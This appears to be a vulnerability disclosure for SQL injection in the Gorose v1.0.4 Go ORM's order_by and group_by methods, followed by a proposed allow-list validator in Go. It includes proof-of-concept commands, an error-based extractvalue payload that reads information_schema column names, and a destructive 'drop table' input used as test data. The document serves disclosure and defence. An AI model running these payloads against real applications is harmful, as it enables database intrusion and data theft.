README.md
dal.go
Gorose v1.0.4 has a SQL injection vulnerability when the `order_by` or `group_by` parameter can be controlled by untrusted input.

Given that, all three of the following commands run successfully (the first two pass a SQL expression where a column name is expected):

```shell
go run dal.go 'if(1=1,id,username)'
go run dal.go 'if(1=2,id,username)'
go run dal.go 'id'
```

In a web application, an attacker can inject SQL such as:

```
http://x.com?order_by=,(extractvalue(1,concat(0x3a,substring(
    (select group_concat(column_name) from
information_schema.columns where table_name like 'xxx'),1,30) )))
```

or via other techniques, such as those described at:
http://www.securityidiots.com/Web-Pentest/SQL-Injection/group-by-and-order-by-sql-injection.html

If developers are not warned about the risk of passing untrusted input to `order_by` / `group_by`, SQL injection may occur.

Developers may assume these methods are safe. Most assume that using an ORM is a complete guard against SQL injection.

So could we add a function like `order_by_safe` that accepts only field names defined in the model?
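One way to implement the allow-list check suggested above, as an added example that is not Gorose's code: `SafeOrderBy`, `identPattern` and `allowedColumns` are hypothetical names, and the allow-list is a constructed stand-in for the columns of a model. The clause is built only from allow-listed identifiers and a fixed direction keyword, so the raw input never reaches the query; it also handles the comma-separated form, which is how the payload in the report (a leading `,`) slips past a naive check.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// allowedColumns is a constructed allow-list standing in for the columns of a
// hypothetical "users" model; a real implementation would derive it from the model.
var allowedColumns = map[string]bool{
	"id":         true,
	"username":   true,
	"created_at": true,
}

// identPattern accepts only plain SQL identifiers. Anything containing
// punctuation, parentheses or whitespace (function calls, subqueries, comment
// markers) fails this check before the allow-list is even consulted.
var identPattern = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`)

// ErrUnsafeOrderBy is returned for any order_by value that is not a list of
// allowed columns, each with an optional ASC/DESC direction.
var ErrUnsafeOrderBy = errors.New("order_by: value is not an allowed column")

// SafeOrderBy validates an untrusted order_by parameter (e.g. from a query
// string) and returns an ORDER BY clause built only from allow-listed names.
// Accepted forms: "col", "col asc", "col desc", and comma-separated lists of
// those. The input itself is never copied into the result.
func SafeOrderBy(input string, allowed map[string]bool) (string, error) {
	var clauses []string
	for _, term := range strings.Split(input, ",") {
		parts := strings.Fields(term)
		// An empty term (leading/trailing/double comma) or extra tokens is rejected.
		if len(parts) == 0 || len(parts) > 2 {
			return "", ErrUnsafeOrderBy
		}
		col := parts[0]
		if !identPattern.MatchString(col) || !allowed[col] {
			return "", ErrUnsafeOrderBy
		}
		dir := "ASC"
		if len(parts) == 2 {
			switch strings.ToUpper(parts[1]) {
			case "ASC", "DESC":
				dir = strings.ToUpper(parts[1])
			default:
				return "", ErrUnsafeOrderBy
			}
		}
		// Quote with backticks (MySQL style) so a column named like a keyword is still safe.
		clauses = append(clauses, fmt.Sprintf("`%s` %s", col, dir))
	}
	return strings.Join(clauses, ", "), nil
}

func main() {
	// Constructed inputs: two benign values, the expression from the report's
	// PoC, a truncated form of the report's injection payload, and a stacked query.
	inputs := []string{
		"id",
		"username desc, created_at",
		"if(1=1,id,username)",
		",(extractvalue(1,concat(0x3a,'x')))",
		"id; drop table users",
	}
	for _, in := range inputs {
		clause, err := SafeOrderBy(in, allowedColumns)
		if err != nil {
			fmt.Printf("%-40q rejected: %v\n", in, err)
			continue
		}
		fmt.Printf("%-40q -> ORDER BY %s\n", in, clause)
	}
}
```

The same pattern applies to `group_by`: validate each term against the model's columns and emit the clause from the allow-list, not from the request.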
